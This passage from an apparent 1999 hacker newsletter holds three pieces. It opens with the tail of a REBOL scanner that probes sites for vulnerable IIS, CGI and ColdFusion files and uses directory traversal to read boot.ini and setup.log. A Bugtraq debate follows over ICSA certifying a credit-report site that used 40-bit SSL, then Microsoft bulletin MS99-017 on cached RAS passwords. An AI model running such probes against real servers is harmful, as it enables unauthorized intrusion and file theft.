- if ss == yes [ print "administrators.pwd" ]
- tt: exists? join http:// [ site "/_vti_pvt/shtml.dll " ]
- if tt == yes [ print "shtml.dll" ]
- uu: exists? join http:// [ site "/_vti_pvt/shtml.exe " ]
- if uu == yes [ print "shtml.exe" ]
- vv: exists? join http:// [ site "/cgi-dos/args.bat " ]
- if vv == yes [ print "args.bat" ]
- ww: exists? join http:// [ site "/cgi-win/uploader.exe " ]
- if ww == yes [ print "uploader.exe" ]
- xx: exists? join http:// [ site "/cgi-bin/rguest.exe " ]if
- xx == yes [ print "rguest.exe" ]
- yy: exists? join http:// [ site "/cgi-bin/wguest.exe " ]
- if yy == yes [ print "wguest.exe" ]
- zz: exists? join http:// [ site "/scripts/issadmin/bdir.htr " ]
- if zz == yes [ print "BDir - Samples" ]
- aaa: exists? join http:// [ site "/scripts/CGImail.exe " ]
- if aaa == yes [ print "CGImail.exe" ]
- bbb: exists? join http:// [ site "/scripts/tools/newdsn.exe " ]
- if bbb == yes [ print "newdsn.exe" ]
- ccc: exists? join http:// [ site "/scripts/fpcount.exe " ]
- if ccc == yes [ print "fpcount.exe" ]
- ddd: exists? join http:// [ site "/cfdocs/expelval/openfile.cfm " ]
- if ddd == yes [ print "openfile.cfm" ]
- eee: exists? join http:// [ site "/cfdocs/expelval/exprcalc.cfm " ]
- if eee == yes [ print "exprcalc.cfm" ]
- fff: exists? join http:// [ site "/cfdocs/expelval/displayopenedfile.cfm " ]
- if fff == yes [ print "displayopenedfile.cfm" ]
- ggg: exists? join http:// [ site "/cfdocs/expelval/sendmail.cfm " ]
- if ggg == yes [ print "sendmail.cfm" ]
- hhh: exists? join http:// [ site "/iissamples/exair/howitworks/codebrws.asp " ]
- if hhh == yes [ print "codebrws.asp" ]
- iii: exists? join http:// [ site "/iissamples/sdk/asp/docs/codebrws.asp " ]
- if iii == yes [ print "codebrws.asp" ]
- jjj: exists? join http:// [ site "/msads/Samples/SELECTOR/showcode.asp " ]
- if jjj == yes [ print "showcode.asp" ]
- kkk: exists? join http:// [ site "/search97.vts " ]if
- kkk == yes [ print "search97.vts" ]
- lll: exists? join http:// [ site "/carbo.dll " ]
- if lll == yes [ print "carbo.dll" ]
- mmm: exists? http-port open [
- scheme: 'tcp
- site "/../spool/username/mail.txt " port-id:8002]
- if mmm == yes [ print "CMail" ]
- nnn: exists? http-port open [
- scheme: 'tcp
- site "/../newuser.txt " port-id:8080]
- if nnn == yes [
- print "FTGte" ]
- ooo: exists? http-port open [
- scheme: 'tcp
- site "/../../../../../boot.ini " port-id:8000]
- if ooo == yes [
- print "NTMail"
- ppp: exists? http-port open [
- scheme: 'tcp
- site "/../../../winnt/repair/setup.log " port-id:2301]
- if ppp == yes [
- print "Compaq Insight"] ]
-
- @HWA
-
-
- 47.0 ICSA certifies weak crypto as secure
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Thu, 27 May 1999 00:24:26 -0700
- From: Lucky Green <shamrock@NETCOM.COM>
- To: BUGTRAQ@netspace.org
- Subject: ICSA certifies weak crypto as secure
-
- I am becoming concerned about the apparent lack of professional competence
- within even well-known segments of the security community. I hope the
- incident I discovered is an isolated one, but even a single such incident is
- disquieting.
-
- There is a site that offers credit reports to consumers called
- ConsumerInfo.com. https://www.consumerinfo.com
-
- The site owner seems to have tried to do everything right. They joined
- TrustE. They had their site certified by ICSA. They clearly have given
- security a serious thought. But the company and all its customers were
- severely let down by ICSA, since the highly confidential information
- submitted by the user to the site is insufficiently "secured" by 40bit TLS.
- And it is not as if using 128 bit would have been a challenge. The site uses
- IIS and is located in the US. (Not that deploying 40 bit crypto would be
- acceptable even outside the US).
-
- I find it frightening to think that somebody calling themselves a security
- professional might even consider certifying a site using 40bit SSL to
- protect crucial customer information. Especially a site in the financial
- sector. Certifying obfuscation as security is an unacceptable level of
- performance by any computer security professional.
-
- I would like to be able to blame simple ignorance of crypto for this deed,
- which alone would be bad enough coming from a security "professional", but I
- am afraid that's not possible since it is inconceivable that the certifying
- ICSA member was unaware that 128 bit TLS/SSL is industry standard. Instead,
- we must assume that for reasons unknown, but ultimately irrelevant, a
- certification was issued for technology the issuer knew to not afford the
- customer security or simply didn't bother to check the crypto strength.
- Either way this condemns ICSA (a member of the Gartner Group), and reflects
- very badly on our industry as a whole.
-
- --Lucky Green <shamrock@netcom.com>
- PGP 5.x encrypted email preferred
-
- ----------------------------------------------------------------------------
-
- From: Peter Gutmann <pgut001@cs.auckland.ac.nz>
- To: BUGTRAQ@netspace.org
- Subject: Re: ICSA certifies weak crypto as secure
-
- "Lucky Green" <shamrock@netcom.com> writes:
-
- >I am becoming concerned about the apparent lack of professional competence
- >within even well-known segments of the security community. I hope the
- >incident I discovered is an isolated one, but even a single such incident is
- >disquieting.
-
- [...]
-
- >I find it frightening to think that somebody calling themselves a security
- >professional might even consider certifying a site using 40bit SSL to
- >protect crucial customer information. Especially a site in the financial
- >sector. Certifying obfuscation as security is an unacceptable level of
- >performance by any computer security professional.
-
- I think it's pretty common, in 1997 I heard of Ernst and Young in NZ certifying
- 40-bit SSL as being secure for banking use. I mentioned this in a posting to
- sci.crypt titled "Crypto for beancounters" and got several responses from
- people saying they'd had similar experiences (not necessarily with E&Y, but
- with Big 6 firms who did security audits). The summary of the responses was:
-
- -- Snip --
-
- [...]
-
- - Getting a security system accepted is more likely if it's been reviewed by
- the company auditors, even if the people involved don't have much experience
- with the technology.
-
- - Even if the auditors don't have much crypto experience, they're generally
- very good at finding things like procedural flaws. Most real systems fail
- because they're not used properly, not because of technical attacks.
- Accountants/auditing firms are very good at finding problems like this.
-
- - Some firms may have experience in auditing crypto, but more importantly they
- should be able to call in outside experts to check the crypto. Requiring
- that the audit report include details of how the crypto was evaluated and (if
- external experts were used) by who would be a good idea.
-
- In summary use the auditing firm to cover security procedures, but (unless they
- have expertise in the area) leave assessment of the crypto software to known
- experts in the field and/or insist in seeing details of how the crypto was
- assessed.
-
- -- Snip --
-
- It's really just an issue of being able to prove due diligence - all you need
- is the right people to check the "Uses encryption" box and you're OK. Whether
- the encryption is any good or not is largely irrelevant, at least for the
- purposes of the exercise, which is to pass the audit.
-
- Peter.
-
- ----------------------------------------------------------------------------
-
- Date: Thu, 27 May 1999 16:14:17 -0400
- From: Jon McCown <jmccown@ICSA.NET>
- To: BUGTRAQ@netspace.org
- Subject: ICSA - Certified Sites and Criteria Issues
-
- -----BEGIN PGP SIGNED MESSAGE-----
-
- While I am constrained by NDAs from discussing the specific issues of
- any particular ICSA customer's security issues or policy, I will
- respond "in general" to Lucky Green's posting regarding the use of
- 40-bit cryptography as part of an ICSA certified configuration.
-
- Participants in our site certification program (TruSecure) are
- required to meet in excess 200 criteria elements; covering such issues
- as physical security, business continuity, personnel management,
- network architecture, patches and updates, privacy, and sensitive
- information handling. Nearly all of the criteria elements are
- driven by the customer's security and operational policy-- which is
- derived from their business objectives and risk management approach.
-
- The 'specific' criteria elements which govern the use of cryptography
- in the context of the customer site are (verbatim):
-
- HUF0007: The handling procedures, security measures, and
- classifications for sensitive information are documented in a
- Sensitive Data Policy. The procedures identified in the policy are
- in place.
- HUF0014: The site's Internet Security Policy, as documented on form
- TS012.01 - Security Posture and Policy, has been implemented
- HUF0027: If client data is gathered by the target, then the site
- must publish online its site visitor privacy, and user data security
- policies.
- SVC0034: Sensitive Information, as identified in HUF0007 is
- encrypted and uses protocols which are acceptable to both the host and
- user.
- [in this context the "host" is the site operator and the "user" is
- their client base]
-
- In this context _is_ possible for a customer to mandate (via their
- own policy) use of whatever levels of cryptography they view as being
- appropriate to their business model and customer requirements. For
- example, if a customer policy specifies 128-bit TLS,
- client-certificates, and token-based auth-- they will be validated at
- that level. And if validating the server's identity to the end-user,
- or no-hassle compatibility with zillions of consumers' bargain-club-PC
- 40-bit browsers is a goal-- a different policy might well result.
-
- Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit
- encryption have become low-hanging-fruit on the confidentiality tree.
- The Gilmore/EFF demonstrations and recent IETF SAG discussions have
- put that writing on the wall. Do we need to add an "appropriate
- crypto strength" element to the TruSecure criteria? Yes I guess we
- do.
-
- - - Jon McCown, ICSA Labs
-
-
-
- -----BEGIN PGP SIGNATURE-----
- Version: PGP 5.5.5
-
- iQCVAwUBN02nmaN04bWY62GPAQEwwgP/aJLdrxCNRkRJAtp9mdbVb2+tZttwiLbI
- 77gbVtbyrFG29iqp/qs0zIz4+ZS73+8fGqisaWgFyRiaM1FJhLXyjQbRVrUkAqJq
- F/5cTmuTF9DOwsada+l8iq9ZO+VNk2AAo/TJnqaW3Y0/cNn2+XmA3edSgAEydO5D
- Ox4VuVRLLCo=
- =Mkwn
- -----END PGP SIGNATURE-----
-
- ----------------------------------------------------------------------------
-
- Date: Thu, 27 May 1999 16:06:17 -0700
- From: Lucky Green <shamrock@NETCOM.COM>
- To: BUGTRAQ@netspace.org
- Subject: Re: ICSA - Certified Sites and Criteria Issues
-
- > From: Jon McCown [mailto:jmccown@icsa.net]
- > In this context _is_ possible for a customer to mandate (via their
- > own policy) use of whatever levels of cryptography they view as being
- > appropriate to their business model and customer requirements. For
- > example, if a customer policy specifies 128-bit TLS,
- > client-certificates, and token-based auth-- they will be validated at
- > that level. And if validating the server's identity to the end-user,
- > or no-hassle compatibility with zillions of consumers' bargain-club-PC
- > 40-bit browsers is a goal-- a different policy might well result.
-
- Now I am really getting worried. From your post it is clear that you, a
- representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a
- server you by no means prevent users limited to 40 bit crypto from accessing
- it.
-
- Sure, a server can be specifically configured to not allow access by 40 bit
- browsers, but the overwhelming majority of 128 bit capable websites support
- both 128 and 40 bit crypto and will automatically use the highest strength
- supported by the browser. No incompatibility issues are introduced by
- enabling full-strength crypto.
-
- The site certified by ICSA did not support 128 bit crypto even to browsers
- that support it. Which is, IMHO, unacceptable for a site that had their
- security checked by an audit.
-
- --Lucky
-
- ----------------------------------------------------------------------------
-
- Date: Thu, 27 May 1999 19:23:19 -0400
- From: Russ <Russ.Cooper@RC.ON.CA>
- To: BUGTRAQ@netspace.org
- Subject: Re: ICSA - Certified Sites and Criteria Issues
-
- If ICSA is
-
- "constrained by NDAs from discussing the specific issues of any
- particular ICSA customer's security issues or policy"
-
- and
-
- "Nearly all of the criteria elements are driven by the customer's
- security and operational policy-- which is derived from their business
- objectives and risk management approach."
-
- and you say
-
- "Do we need to add an "appropriate crypto strength" element to the
- TruSecure criteria? Yes I guess we do."
-
- then what, pray tell, should a consumer visiting
-
- https://www.consumerinfo.com/n/security.htm?htm+l
-
- glean from the fact that the page linked on their site from your ICSA
- icon contains the following;
-
- "ConsumerInfo.Com employs sophisticated encryption"
-
- and further states;
-
- "In addition to employing these high-security measures, ConsumerInfo.Com
- has undergone the rigorous certification process for the International
- Computer Security Association's (ICSA) Web Certification program. This
- process examined every aspect of our security precautions, encompassing
- an on-site inspection of our facility for physical security and policy
- plus a remote assessment of our potential vulnerabilities to web-based
- attacks. In addition, the ICSA's certification is a continuous process,
- repeated several times during the year and renewed annually, so you know
- ConsumerInfo.Com's security measures are state-of-the-art."
-
- However, the bottom line is that;
-
- - They are *NOT* employing "sophisticated encryption", they're employing
- the least sophisticated deployable.
-
- - They also say ICSA "examined every aspect of our security
- precautions", but in fact, you only examined those aspects defined in
- their policies.
-
- - They also claim that because of your certification, their customers
- "know ConsumerInfo.Com's security measures are state-of-the-art" when in
- fact their *NOT*.
-
- I will not, at this time, question the integrity of ICSA. Nor will I
- suggest that ConsumerInfo.Com is out and out lying.
-
- I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com
- to mislead their customers via the ICSA Web Certification approval. By
- ICSA not being permitted, by NDA, to discuss certification they have
- performed, it renders, IMNSHO, the certification itself *worthless*. It
- would appear that ConsumerInfo.Com has been allowed to say anything they
- want about their work with ICSA and, by NDA, ICSA cannot rebuke it.
-
- ICSA Web Certification reports should be public, or, not trusted.
-
- Cheers,
- Russ - NTBugtraq Editor
-
- ----------------------------------------------------------------------------
-
- Date: Thu, 27 May 1999 18:46:47 -0400
- From: Adam Shostack <adam@HOMEPORT.ORG>
- To: BUGTRAQ@netspace.org
- Subject: Re: ICSA - Certified Sites and Criteria Issues
-
- You can ISO9001 certify the process of shooting yourself in the foot,
- so long as the process is documented and reliably produces the proper
- result.
-
- Do you require certified sites post their security policy? If not,
- how do I know that the policy doesn't explicitly accept the presense
- of phf in /cgi-bin? Would it be possible to have that in my policy
- and still get certified, if I have good business reasons for putting
- it in place?
-
- This flap may be a result of certifying compliance to policy, but the
- relying parties on your mark should not be expected to be able to read
- and understand those policies; they should be able to rely on your
- mark to say that the policies make sense. Incidentally, do you
- require sites to post these policies to which you certify compliance?
-
- I think that the high level message here (and from the
- TRUSTe/Microsoft crap) is that what organizations like ICSA and Truste
- are certifying is not what people who may be expected to rely on those
- marks expect is being certified.
-
- Adam
-
-
-
- On Thu, May 27, 1999 at 04:14:17PM -0400, Jon McCown wrote:
- | -----BEGIN PGP SIGNED MESSAGE-----
- |
- | While I am constrained by NDAs from discussing the specific issues of
- | any particular ICSA customer's security issues or policy, I will
- | respond "in general" to Lucky Green's posting regarding the use of
- | 40-bit cryptography as part of an ICSA certified configuration.
- |
- | Participants in our site certification program (TruSecure) are
- | required to meet in excess 200 criteria elements; covering such issues
- | as physical security, business continuity, personnel management,
- | network architecture, patches and updates, privacy, and sensitive
- | information handling. Nearly all of the criteria elements are
- | driven by the customer's security and operational policy-- which is
- | derived from their business objectives and risk management approach.
- |
- | The 'specific' criteria elements which govern the use of cryptography
- | in the context of the customer site are (verbatim):
- |
- | HUF0007: The handling procedures, security measures, and
- | classifications for sensitive information are documented in a
- | Sensitive Data Policy. The procedures identified in the policy are
- | in place.
- | HUF0014: The site's Internet Security Policy, as documented on form
- | TS012.01 - Security Posture and Policy, has been implemented
- | HUF0027: If client data is gathered by the target, then the site
- | must publish online its site visitor privacy, and user data security
- | policies.
- | SVC0034: Sensitive Information, as identified in HUF0007 is
- | encrypted and uses protocols which are acceptable to both the host and
- | user.
- | [in this context the "host" is the site operator and the "user" is
- | their client base]
- |
- | In this context _is_ possible for a customer to mandate (via their
- | own policy) use of whatever levels of cryptography they view as being
- | appropriate to their business model and customer requirements. For
- | example, if a customer policy specifies 128-bit TLS,
- | client-certificates, and token-based auth-- they will be validated at
- | that level. And if validating the server's identity to the end-user,
- | or no-hassle compatibility with zillions of consumers' bargain-club-PC
- | 40-bit browsers is a goal-- a different policy might well result.
- |
- | Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit
- | encryption have become low-hanging-fruit on the confidentiality tree.
- | The Gilmore/EFF demonstrations and recent IETF SAG discussions have
- | put that writing on the wall. Do we need to add an "appropriate
- | crypto strength" element to the TruSecure criteria? Yes I guess we
- | do.
- |
- | - - Jon McCown, ICSA Labs
- |
- |
- |
- | -----BEGIN PGP SIGNATURE-----
- | Version: PGP 5.5.5
- |
- | iQCVAwUBN02nmaN04bWY62GPAQEwwgP/aJLdrxCNRkRJAtp9mdbVb2+tZttwiLbI
- | 77gbVtbyrFG29iqp/qs0zIz4+ZS73+8fGqisaWgFyRiaM1FJhLXyjQbRVrUkAqJq
- | F/5cTmuTF9DOwsada+l8iq9ZO+VNk2AAo/TJnqaW3Y0/cNn2+XmA3edSgAEydO5D
- | Ox4VuVRLLCo=
- | =Mkwn
- | -----END PGP SIGNATURE-----
-
- --
- "It is seldom that liberty of any kind is lost all at once."
- -Hume
-
- ----------------------------------------------------------------------------
-
- Date: Thu, 27 May 1999 15:44:47 -0700
- From: David Schwartz <davids@WEBMASTER.COM>
- To: BUGTRAQ@netspace.org
- Subject: Re: ICSA - Certified Sites and Criteria Issues
-
- So does ICSA certification mean simply that a company has met its own
- requirements? (As opposed to some set of objectively validated or
- ICSA-imposed requirements?)
-
- DS
-
- > Participants in our site certification program (TruSecure) are
- > required to meet in excess 200 criteria elements; covering such issues
- > as physical security, business continuity, personnel management,
- > network architecture, patches and updates, privacy, and sensitive
- > information handling. Nearly all of the criteria elements are
- > driven by the customer's security and operational policy-- which is
- > derived from their business objectives and risk management approach.
- [snip]
- > In this context _is_ possible for a customer to mandate (via their
- > own policy) use of whatever levels of cryptography they view as being
- > appropriate to their business model and customer requirements. For
- > example, if a customer policy specifies 128-bit TLS,
- > client-certificates, and token-based auth-- they will be validated at
- > that level. And if validating the server's identity to the end-user,
- > or no-hassle compatibility with zillions of consumers' bargain-club-PC
- > 40-bit browsers is a goal-- a different policy might well result.
- [snip]
-
- ----------------------------------------------------------------------------
-
- Date: Fri, 28 May 1999 11:09:08 +0100
- From: Simon Liddington <sjl96v@ECS.SOTON.AC.UK>
- To: BUGTRAQ@netspace.org
- Subject: Re: ICSA - Certified Sites and Criteria Issues
-
- Lucky Green <shamrock@NETCOM.COM> writes:
-
- > Sure, a server can be specifically configured to not allow access by 40 bit
- > browsers, but the overwhelming majority of 128 bit capable websites support
- > both 128 and 40 bit crypto and will automatically use the highest strength
- > supported by the browser. No incompatibility issues are introduced by
- > enabling full-strength crypto.
-
- In my experience with Netscape and apache-SSL the lowest strength
- cipher (apart from no cipher at all) is used. Unless you disable the
- weaker ciphers in Netscape, netscape tries them first and will connect
- if the server allows them.
-
- Of course this doesn't invalidate your statement that there is no
- problem with enabling full-strength crypto, but it does mean there is
- also little to gain by doing so.
-
- Simon
-
- --
- -----------------------------------------------------------------------
- | Simon Liddington | |
- | E-Mail : sjl96v@ecs.soton.ac.uk | Tel (work) : +44 (0)1703 592422 |
- -----------------------------------------------------------------------
-
- ----------------------------------------------------------------------------
-
- Date: Fri, 28 May 1999 13:48:30 -0500
- From: Jeremey Barrett <jeremey@TERISA.COM>
- To: BUGTRAQ@netspace.org
- Subject: Re: ICSA - Certified Sites and Criteria Issues
-
- On Fri, May 28, 1999 at 11:09:08AM +0100, Simon Liddington wrote:
- > Lucky Green <shamrock@NETCOM.COM> writes:
- >
- > > Sure, a server can be specifically configured to not allow access by 40 bit
- > > browsers, but the overwhelming majority of 128 bit capable websites support
- > > both 128 and 40 bit crypto and will automatically use the highest strength
- > > supported by the browser. No incompatibility issues are introduced by
- > > enabling full-strength crypto.
- >
- > In my experience with Netscape and apache-SSL the lowest strength
- > cipher (apart from no cipher at all) is used. Unless you disable the
- > weaker ciphers in Netscape, netscape tries them first and will connect
- > if the server allows them.
-
- A client in SSL sends all its supported ciphers at once, it doesn't "try"
- some, then "try" others. The server chooses which cipher to use from amongst
- those the client supports. If you have 128-bit capable Netscape, and 128-bit
- capable Apache SSL, or a Netscape server, or Stronghold, or whatever, you get
- full strength crypto, unless there's a bug in the server.
-
- Obviously if one or the other doesn't support it, you don't.
-
- Regards,
- Jeremey.
- --
- Jeremey Barrett <jeremey@terisa.com>
- GPG fingerprint = 7BB2 E1F1 5559 3718 CE25 565A 8455 D60B 8FE8 B38F
-
- ----------------------------------------------------------------------------
-
- Date: Fri, 28 May 1999 16:39:03 -0400
- From: David Kennedy CISSP <dmkennedy@COMPUSERVE.COM>
- To: BUGTRAQ@netspace.org
- Subject: Re: ICSA - Certified Sites and Criteria Issues
-
- -----BEGIN PGP SIGNED MESSAGE-----
-
- I'm taking it upon myself to respond for Jon who's busy trying to
- have a life outside the office. As he did, I'm going to try to steer
- clear of a specific discussion of any of our customers.
- We thank the open review process of the total crypto community for
- bringing this to our attention. We will include this discussion in
- our ongoing process to maintain the TruSecure criteria.
- I'd like to restate what I feel is the most pertinent criterion that
- bears on this issue: the criterion requires encryption and protocols
- acceptable to both the host and the client. As a practical matter,
- for web activity this is either 40-bit SSL or 128-bit SSL. The
- TruSecure customers have the flexibility to choose, and their
- customers, in turn, decide if this is "acceptable."
- Clearly, most of the readers of these lists regard 128-bit SSL as the
- minimum they would find acceptable. However I think those same
- readers would acknowledge that the majority of users on the Internet
- worldwide today are using a 40-bit version of the popular browsers. A
- business has every right to decide if 40-bit SSL is the level of
- security they feel is appropriate for the information they are
- processing.
- A TruSecure customer may make a business decision that 40-bit SSL is
- "acceptable" for the communication of data from their hosts to their
- clients. Once this decision is made, they may configure their systems
- for 40-bit only.
- It should be clear from Jon's previous message that, in the abstract,
- 128-bit SSL is preferable to 40-bit SSL. However, 40-bit SSL for all
- it's faults, protects data in transit from the client to the host from
- all but a targeted attack by an experienced, well-resourced adversary.
- 40-bit SSL provides superior security than the majority of meatspace
- exchanges of sensitive information.
-
- At 07:53 PM 5/27/99 -0400, David Schwartz wrote:
- >
- > So does ICSA certification mean simply that a company has met its own
- >requirements? (As opposed to some set of objectively validated or
- >ICSA-imposed requirements?)
-
- Certification requires compliance with our criteria. The best web
- page we have describing this is: http://www.trusecure.net/process.html
- If you want the nitty gritty details, browse to
- http://www.trusecure.net/
- and either go to the library or click the "contact us" link.
- ICSA helps customers address risks across multiple categories
- (physical, hacking, malicious code, spoofing, eavesdropping, lack of
- knowledge/awareness, lack of trust, DoS, privacy-user by site & data
- subject, lack of interoperability). We developed a methodology to
- focus on high risk/cost categories and follow this methodology with
- our customers. When addressing the issue of privacy, ICSA approaches
- the matter by addressing the risk of capturing customer information
- across the wire and as it resides on the customers server. We do
- require the use of encryption but choose to let the customer to decide
- the level based on the assets they are protecting, the impact to their
- business, and the fact that the real concern is the data residing on
- the server un-encrypted. ICSA therefore works with our customers to
- set up multiple layers of synergistic controls that not only address
- the use of encryption but also those mentioned above.
- We rely on addressing our customers' issues not only from a
- technology perspective, but from a business level one as well. When
- deploying security, ICSA will always address how technology impacts
- our customers operations and costs.
-
- At 07:31 PM 5/27/99 -0400, Adam Shostack wrote:
- >Do you require certified sites post their security policy? If not,
- >how do I know that the policy doesn't explicitly accept the presense
- >of phf in /cgi-bin? Would it be possible to have that in my policy
- >and still get certified, if I have good business reasons for putting
- >it in place?
- >
-
- For the purposes of site certification we would not certify a site
- with phf in the cgi-bin directory. Our criteria do restrict this.
- However, we have customers who have purchased TruSecure but have "good
- business reasons" for ignoring or violating one or more of our
- criteria. ICSA has a process to review these occurrences and have
- withheld certification from some of these customers. Indeed, we have
- customers who are quite satisfied with their TruSecure purchase
- without achieving certification. Without turning into a
- sales/marketing droid, we try to emphasize TruSecure as a process to
- provide acceptable security to the customer; many customers are
- satisfied without completing certification and know this before their
- purchase.
-
- >This flap may be a result of certifying compliance to policy, but the
- >relying parties on your mark should not be expected to be able to read
- >and understand those policies; they should be able to rely on your
- >mark to say that the policies make sense. Incidentally, do you
- >require sites to post these policies to which you certify compliance?
- >
-
- Certified sites must post a privacy and user data security policy as
- part of our criteria. We do not require the site to post their
- security policy. Most enterprises would be reluctant to post an
- un-santitized version of their security policies which opens the
- question of how much sanitization is necessary or desirable. I don't
- believe it would be wise to require they post the nitty gritty details
- of their policies. One would not want details such as these widely
- known:
-
- Inbound telnet is blocked except from IP xxx.xxx.xxx.xxx to
- yyy.yyy.yyy.yyy which is permitted so Y Inc can review progress
- reports on Project Z.
- Employees assigned to our office in Sri Lanka will use PPTP to host
- at zzz.zzz.zzz.zzz to access the company intranet.
-
- At 07:36 PM 5/27/99 -0400, Russ wrote:
- >However, the bottom line is that;
- >
- >- They are *NOT* employing "sophisticated encryption", they're employing
- >the least sophisticated deployable.
- >
-
- I can't respond to this directly.
-
- >- They also say ICSA "examined every aspect of our security
- >precautions", but in fact, you only examined those aspects defined in
- >their policies.
-
- For any customer, we examine every aspect defined by *our* criteria,
- which includes examining their security policies and implementations,
- but these two aspects are but a handful of the 200+ criteria we
- include in TruSecure.
-
- >
- >- They also claim that because of your certification, their customers
- >"know ConsumerInfo.Com's security measures are state-of-the-art" when in
- >fact their *NOT*.
-
- This issue is with the semantics on a page not maintained by ICSA.
-
- >
- >I will not, at this time, question the integrity of ICSA. Nor will I
- >suggest that ConsumerInfo.Com is out and out lying.
- >
- >I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com
- >to mislead their customers via the ICSA Web Certification approval. By
- >ICSA not being permitted, by NDA, to discuss certification they have
- >performed, it renders, IMNSHO, the certification itself *worthless*. It
- >would appear that ConsumerInfo.Com has been allowed to say anything they
- >want about their work with ICSA and, by NDA, ICSA cannot rebuke it.
- >
-
- The way this paragraph is constructed makes it impossible to respond
- to it. We would like to respond, and explain how certification is not
- as you say, "worthless," but to do so would be to reveal confidential
- information about a customer.
-
- At 07:36 PM 5/27/99 -0400, Lucky Green wrote:
- >
- >Now I am really getting worried. From your post it is clear that you, a
- >representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a
- >server you by no means prevent users limited to 40 bit crypto from accessing
- >it.
- >
-
- Incorrect, we understand this fact.
- Again, the criteria require encryption and protocols acceptable to
- both the host and the client. Popular browsers provide the capability
- for users to click on an icon and determine the encryption being used,
- if any. Undoubtedly that's how this thread started.
-
-
- -----BEGIN PGP SIGNATURE-----
- Version: PGP Personal Privacy 6.0.2
-
- iQCVAwUBN07+V/GfiIQsciJtAQECrgQA3IsyfP6AEWV4OarIG5xs46sIWP/IdSYQ
- sWvEYaENjbFdyu8tOH2hq5y1bm9/ALM8nITz94zYs/kZupJ2XZR5GYFhOpyfbG2v
- 4qzL1pml8Ht2aKsJ+r6Ghf9cp2qOfCejigSWcHTfRLNhgoI2u1CL6G6ua3OkDBS8
- 5KVOeNhwDK0=
- =GqTy
- -----END PGP SIGNATURE-----
-
- Regards,
- David Kennedy CISSP
- Director of Research Services, ICSA Inc. http://www.icsa.net
-
- Using encryption on the Internet is the equivalent of arranging
- an armored car to deliver credit-card information from someone
- living in a cardboard box to someone living on a park bench.
- Gene Spafford
-
- ----------------------------------------------------------------------------
-
- Date: Fri, 28 May 1999 20:08:35 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: Re: [ISN] ICSA certifies weak crypto as secure
-
-
- Reply From: edison <edison@dhp.com>
-
- A few thoughts on the subject.
-
- First, with the frightening amount of completely unsecured consumer info
- sites on (and off) the net today, I would disagree that ICSA's actions
- reflect "very badly" on our industry. Because there are much easier
- targets, consumerinfo.com can be resonably certain that it won't even be
- attacked for quite some time. At least until most of the rest of the
- sites are secure in the same fashion.
-
- Don't get me wrong, I'm not advocating 40-bit encryption as 'secure,' but
- it is 'more secure' than nothing at all. And until the ingorant IT
- managers with sites on the net clue in, this kind of certification won't
- _hurt_ our industry. Please don't attack me - I'm just saying that while
- we professionals might recognize weaknesses in this level of security,
- those outside don't and "we" still look good to them.
-
- Second, if you've every been to a hacker BBS/site, you have to know that
- getting into Equifax or any other reporting agency is pitifully easy. If
- you think 40-bit encryption is weak, how about a 2 character alphanumeric
- "password" on accounts that can be pulled from your own credit report?
- And for that matter, there are posted algorithms to the account scheme, so
- you can even generate your own.
-
- I will agree that there are more unsavory characters on the net than there
- are people aware of CBI dialups. But then again, 40-bit crypto is not
- exactly _easy_ to crack.
-
- -edison
-
- On Fri, 28 May 1999, cult hero wrote:
-
- > I am becoming concerned about the apparent lack of professional competence
- > within even well-known segments of the security community. I hope the
- > incident I discovered is an isolated one, but even a single such incident
- > is disquieting.
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: OSAll [www.aviary-mag.com]
-
- @HWA
-
- 48.0 RAS and RRAS vulnerability
- ~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Thu, 27 May 1999 17:18:25 -0400
- From: Russ <Russ.Cooper@RC.ON.CA>
- To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
- Subject: Alert: Microsoft Security Bulletin (MS99-017) - RAS & RRAS Passwords
-
- On March 20th, Dieter Goepferich [dieter.goepferich@bigfoot.com]
- discovered a vulnerability involving both RAS and RRAS. This was
- subsequently reported in Heise Online, a German publication;
-
- http://www.heise.de/newsticker/data/cp-12.04.99-000/
- http://www.heise.de/newsticker/data/hos-15.04.99-000/
-
- Dieter originally reported it via some "product improvement suggestion"
- web form on www.microsoft.de back in March. Together we informed
- Microsoft Security (secure@microsoft.com) back in April.
-
- By default the registry key is only accessible to Administrator and the
- user/owner of the passwords, but it represents a potential threat and a
- location of password information which would not otherwise be expected.
-
- See;
-
- http://www.microsoft.com/security/bulletins/ms99-017.asp
-
- for the complete write up including fix locations. There are two KB
- articles about this (one for RAS, and another for RRAS). They were not
- yet available at the time of writing.
-
- RAS
- http://support.microsoft.com/support/kb/articles/q230/6/81.asp
-
- RRAS
- http://support.microsoft.com/support/kb/articles/q233/3/03.asp
-
- Cheers,
- Russ - NTBugtraq Editor
-
- -------------------------------------------------------------------------------
-
- Date: Thu, 27 May 1999 15:14:46 -0700
- From: aleph1@UNDERGROUND.ORG
- To: BUGTRAQ@netspace.org
- Subject: Microsoft Security Bulletin (MS99-017)
-
- The following is a Security Bulletin from the Microsoft Product Security
- Notification Service.
-
- Please do not reply to this message, as it was sent from an unattended
- mailbox.
- ********************************
-
- Microsoft Security Bulletin (MS99-017)
- --------------------------------------
-
- Patch Available for "RAS and RRAS Password" Vulnerability
-
- Originally Posted: May 27, 1999
-
- Summary
- =======
- Microsoft has released a patch that eliminates a vulnerability in the
- Microsoft (r) Windows NT (r) Remote Access Service (RAS) and Routing and
- Remote Access Service (RRAS) clients, in which a user's password is cached
- even if the user de-selects the "Save password" option.
-
- Issue
- =====
- When the client software for Microsoft RAS or RRAS is used to dial into a
- server, a dialogue requests the user's userid and password for the server.
- On the same dialogue is a checkbox whose caption reads "Save password" and
- which is intended to provide the user with the option to cache their
- security credentials if desired. However, the implemented client
- functionality actually caches the user's credentials regardless of whether
- the checkbox is selected or de-selected.
-
- Cached security credentials, which include the password, are stored in the
- registry and protected by ACLs whose default values authorize only local
- administrators and the user to access them. Windows NT 4.0 Service Pack 4
- also provides the ability to strongly encrypts the password data stored in
- the registry using the SYSKEY feature.
-
